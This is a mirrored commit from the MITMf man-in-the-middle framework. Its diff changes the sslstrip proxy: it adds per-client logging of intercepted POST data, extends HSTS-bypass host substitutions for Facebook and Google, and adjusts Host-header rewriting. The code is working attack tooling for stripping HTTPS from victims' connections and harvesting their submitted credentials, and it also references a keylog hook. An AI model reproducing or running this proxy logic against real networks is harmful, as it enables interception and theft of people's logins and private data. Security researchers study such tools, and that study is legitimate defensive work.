github/MITMf
1
0
Fork 0
mirror of https://github.com/byt3bl33d3r/MITMf.git synced 2025-07-16 10:03:52 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

merged changes from dev

Browse source
This commit is contained in:
byt3bl33d3r 2014-11-29 18:17:56 +01:00
commit 9f4ddc5894
8 changed files with 66 additions and 24 deletions
Download patch file Download diff file Expand all files Collapse all files

3
config_files/hsts_bypass.cfg
View file

@ -7,4 +7,5 @@ mail.google.com = gmail.google.com
accounts.google.se = cuentas.google.se
#for facebook
www.facebook.com = social.facebook.com
www.facebook.com = social.facebook.com
facebook.com = social.facebook.com

6
mitmf.py
View file

@ -28,7 +28,7 @@ if __name__ == "__main__":
slogopts.add_argument("-p", "--post", action="store_true",help="Log only SSL POSTs. (default)")
slogopts.add_argument("-s", "--ssl", action="store_true", help="Log all SSL traffic to and from server.")
slogopts.add_argument("-a", "--all", action="store_true", help="Log all SSL and HTTP traffic to and from server.")
#slogopts.add_argument("-c", "--clients", action='store_true', default=False, help='Log each clients data in a seperate file')
slogopts.add_argument("-c", "--clients", action='store_true', default=False, help='Log each clients data in a seperate file')
sgroup.add_argument("-l", "--listen", type=int, metavar="port", default=10000, help="Port to listen on (default 10000)")
sgroup.add_argument("-f", "--favicon", action="store_true", help="Substitute a lock favicon on secure requests.")
sgroup.add_argument("-k", "--killsessions", action="store_true", help="Kill sessions in progress.")
@ -83,7 +83,7 @@ if __name__ == "__main__":
from sslstrip.StrippingProxyHSTS import StrippingProxy
from sslstrip.URLMonitorHSTS import URLMonitor
URLMonitor.getInstance().setFaviconSpoofing(args.favicon)
URLMonitor.getInstance().setValues(args.favicon, args.clients)
CookieCleaner.getInstance().setEnabled(args.killsessions)
ProxyPlugins.getInstance().setPlugins(load)
@ -100,7 +100,7 @@ if __name__ == "__main__":
from sslstrip.StrippingProxy import StrippingProxy
from sslstrip.URLMonitor import URLMonitor
URLMonitor.getInstance().setFaviconSpoofing(args.favicon)
URLMonitor.getInstance().setValues(args.favicon, args.clients)
CookieCleaner.getInstance().setEnabled(args.killsessions)
ProxyPlugins.getInstance().setPlugins(load)

17
sslstrip/ClientRequestHSTS.py
View file

@ -78,11 +78,11 @@ class ClientRequest(Request):
del headers['if-none-match']
if 'host' in headers:
host = self.urlMonitor.URLgetRealHost("%s" % headers['host'])
logging.debug("Modifing HOST header: %s -> %s" % (headers['host'],host))
headers['host'] = host
headers['securelink'] = '1'
self.setHeader('Host',host)
host = self.urlMonitor.URLgetRealHost("%s" % headers['host'])
logging.debug("Modifing HOST header: %s -> %s" % (headers['host'],host))
headers['host'] = host
headers['securelink'] = '1'
self.setHeader('Host',host)
self.plugins.hook()
@ -116,7 +116,12 @@ class ClientRequest(Request):
host = self.urlMonitor.URLgetRealHost("%s" % lhost)
client = self.getClientIP()
path = self.getPathFromUri()
self.content.seek(0, 0)
try:
self.content.seek(0, 0)
except:
pass
postData = self.content.read()
real = self.urlMonitor.real
patchDict = self.urlMonitor.patchDict

22
sslstrip/ServerConnection.py
View file

@ -54,7 +54,12 @@ class ServerConnection(HTTPClient):
def sendRequest(self):
if self.command == 'GET':
logging.info("%s Sending Request: %s" % (self.client.getClientIP(), self.headers['host']))
message = "%s Sending Request: %s" % (self.client.getClientIP(), self.headers['host'])
if self.urlMonitor.isClientLogging() is True:
self.urlMonitor.writeClientLog(self.client, self.headers, message)
else:
logging.info(message)
self.plugins.hook()
self.sendCommand(self.command, self.uri)
@ -71,7 +76,11 @@ class ServerConnection(HTTPClient):
elif 'keylog' in self.uri:
self.plugins.hook()
else:
logging.warning("%s %s Data (%s):\n%s" % (self.client.getClientIP(),self.getPostPrefix(),self.headers['host'],self.postData))
message = "%s %s Data (%s):\n%s" % (self.client.getClientIP(),self.getPostPrefix(),self.headers['host'],self.postData)
if self.urlMonitor.isClientLogging() is True:
self.urlMonitor.writeClientLog(self.client, self.headers, message)
else:
logging.warning(message)
self.transport.write(self.postData)
def connectionMade(self):
@ -88,6 +97,8 @@ class ServerConnection(HTTPClient):
self.client.setResponseCode(int(code), message)
def handleHeader(self, key, value):
self.plugins.hook()
if (key.lower() == 'location'):
value = self.replaceSecureLinks(value)
@ -100,8 +111,9 @@ class ServerConnection(HTTPClient):
if (value.find('gzip') != -1):
logging.debug("Response is compressed...")
self.isCompressed = True
if (key.lower() == 'strict-transport-security'):
value = 'max-age=0'
#if (key.lower() == 'strict-transport-security'):
# value = 'max-age=0'
elif (key.lower() == 'content-length'):
self.contentLength = value
@ -110,8 +122,6 @@ class ServerConnection(HTTPClient):
else:
self.client.setHeader(key, value)
self.plugins.hook()
def handleEndHeaders(self):
if (self.isImageRequest and self.contentLength != None):
self.client.setHeader("Content-Length", self.contentLength)

6
sslstrip/ServerConnectionFactory.py
View file

@ -40,5 +40,7 @@ class ServerConnectionFactory(ClientFactory):
logging.debug("Retrying via SSL")
self.client.proxyViaSSL(self.headers['host'], self.command, self.uri, self.postData, self.headers, 443)
else:
self.client.finish()
try:
self.client.finish()
except:
pass

1
sslstrip/StrippingProxy.py
View file

@ -20,6 +20,7 @@ from twisted.web.http import HTTPChannel
from ClientRequest import ClientRequest
class StrippingProxy(HTTPChannel):
'''sslstrip is, at heart, a transparent proxy server that does some unusual things.
This is the basic proxy server class, where we get callbacks for GET and POST methods.
We then proxy these out using HTTP or HTTPS depending on what information we have about

27
sslstrip/URLMonitor.py
View file

@ -16,7 +16,7 @@
# USA
#
import re
import re, os
class URLMonitor:
@ -41,6 +41,25 @@ class URLMonitor:
return (client,url) in self.strippedURLs
def writeClientLog(self, client, headers, message):
if not os.path.exists("./logs"):
os.makedirs("./logs")
if (client.getClientIP() + '.log') not in os.listdir("./logs"):
try:
log_message = "#Log file for %s (%s)\n" % (client.getClientIP(), headers['user-agent'])
except KeyError:
log_message = "#Log file for %s\n" % client.getClientIP()
log_file = open("./logs/" + client.getClientIP() + ".log", 'a')
log_file.write(log_message + message + "\n")
log_file.close()
else:
log_file = open("./logs/" + client.getClientIP() + ".log", 'a')
log_file.write(message + "\n")
log_file.close()
def getSecurePort(self, client, url):
if (client,url) in self.strippedURLs:
return self.strippedURLPorts[(client,url)]
@ -69,12 +88,16 @@ class URLMonitor:
self.strippedURLs.add((client, url))
self.strippedURLPorts[(client, url)] = int(port)
def setFaviconSpoofing(self, faviconSpoofing):
def setValues(self, faviconSpoofing, clientLogging):
self.faviconSpoofing = faviconSpoofing
self.clientLogging = clientLogging
def isFaviconSpoofing(self):
return self.faviconSpoofing
def isClientLogging(self):
return self.clientLogging
def isSecureFavicon(self, client, url):
return ((self.faviconSpoofing == True) and (url.find("favicon-x-favicon-x.ico") != -1))

8
sslstrip/URLMonitorHSTS.py
View file

@ -64,14 +64,14 @@ class URLMonitor:
#LEO: Sustituir HOST
if not self.sustitucion.has_key(host):
lhost = host[:4]
if lhost=="www.":
lhost = host[:4]
if lhost=="www.":
self.sustitucion[host] = "w"+host
self.real["w"+host] = host
else:
else:
self.sustitucion[host] = "web"+host
self.real["web"+host] = host
#logging.info("LEO: ssl host (%s) tokenized (%s)" % (host,self.sustitucion[host]) )
logging.info("LEO: ssl host (%s) tokenized (%s)" % (host,self.sustitucion[host]) )
url = 'http://' + host + path
#logging.debug("LEO stripped URL: %s %s"%(client, url))